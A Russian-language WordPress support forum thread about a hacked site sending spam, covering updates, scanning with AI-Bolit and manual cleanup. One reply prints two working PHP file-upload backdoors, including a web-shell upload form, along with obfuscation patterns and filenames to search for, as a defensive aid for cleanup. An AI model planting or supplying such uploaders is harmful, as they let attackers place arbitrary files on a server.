Хостер гонит: спам с сайта шлют. Спасайте!

100%. 4.0 - это пипец какая древняя версия, а не последняя :)

Да, верное, не углядел как-то.

Поставил плагин restore wordpress update, обновился до 4.7.3, поудалял неиспользуемые плагины, прогнал айболитом.

Жалобы были в целом на файл class-phpmailer.php - при обновлении вордпресса айболит на него не ругается.

Шелла так и не сыскал. Все пообновлял, подчистил, ну не знаю, заканчивать на этом или нет, хостер вырубил возможность отправлять письма.

Чего еще можно предпринять?

Если Вас это устраивает + сайты обновлены, ничего подозрительного не находите - вопрос можно считать закрытым.

Добавлю, что сверху на обновленный ВП закинул файл class-phpmailer.php из этой темы https://ru.wordpress.org/support/topic/уязвимость-php-mailer/page/2/

Может, и не надо было, но в нем версия этого самого майлера выше чем в обновленном вордпрессе, не знаю почему )

Да ну...

Там версия 5.2.21, в WP 4.7.3 версия уже 5.2.22

Файл версии 5.2.22 у меня на хосте датируется аж 20 января 17 года.

strefapl, новая версия всегда только на сайте разработчика, а не на стороннем сайте!!!

Качая со стороннего сайта, будьте готовы к шелам и т.п.!

Ок, все понял. Хостеру отписал - а тот шутник, врубил снова возможность отправки писем, мол, такая функция входит в услугу, и с вас санкции сняты. Еще раз попросил отключить - еще раз ответил, мол, санкции сняты. При этом грозит, если еще раз будут слать спам, то вырубит акк :) Таймвеб )

Но в целом, службой поддержки доволен - оперативные ребята, помогли.

А может быть, и не было никакого шелла. И уязвимость, может быть, здесь ни при чём. Может быть, у Вас работает функция ответа на мэйл, который спамер забивает в форму обратной связи как якобы свой. Типа "прислать копию на этот адрес". И шлёте автоматом копии на все адреса. Проверьте этот вариант.

Да нет.

Мне телегу прислали вот такую, там более 1000 мейлов отправлено за пару часов:

К сожалению, айболит находит не все файлы, которые залиты на сайт, лежать втихаря в какой нибудь папочки и используются злоумышленниками например для заливки новых вредоносных скриптов, например Айболит никак не отмечает обычный PHP скрипт для аплоада (загрузки на сервер) любых файлов. Например у тебя с большой вероятностью ещё остались "левые" файлы, в которых содержится следующий код:

<?php
if ($mode=='upload') {
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
	 echo $_FILES["filename"]["name"];
   } 
} 
?>

или

<?php
print '<h1>#p@$c@#</h1>';
echo "D00D: "; /*_*/
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "</form>\n";   

if ( @is_uploaded_file( $_FILES["filename"]["tmp_name"] ))
{
	  
	move_uploaded_file($_FILES["filename"]["tmp_name"],    $_FILES["filename"]["name"]);
	  
	$file = $_FILES["filename"]["name"];  
	echo "<a href=\"$file\">$file</a>";
	  
}
else
{
	/*_*/
	echo("empty");
	/*_*/
}
  
$var1 = $_SERVER['SCRIPT_FILENAME'];
/*_*/
touch( $var1 );
?>

К сожалению, айболит не помечает такие файлы или код как подозрительные. Ну во-первых, потому, что такие куски кода присутствуют во многих стандартных файлах любой CMS.

В общем сейчас тебе надо вручную полазить по папкам сайт ,поискать файлы которые не относятся к твоей CMS. Я лечил много сайтов и часто вредоносный код содержистя в файлах с именами: mail.php, ini.php, backup.php, license.php, gallery.phpб config.php... в общем вручную посмотри

они обычно содержат подобные куски кода:

...["\x67\x6fg\x63\x7a\x68\x62\x6dq"]...

или

...chr(101).chr(99).chr(111).chr(100)....

Так же проверь файл .htaccess на наличие левых директив

P.S. Как то тут форум изменяет PHP код непонятно, звёздочки в коде и цифры 91, 93 выше сам форум тут добавил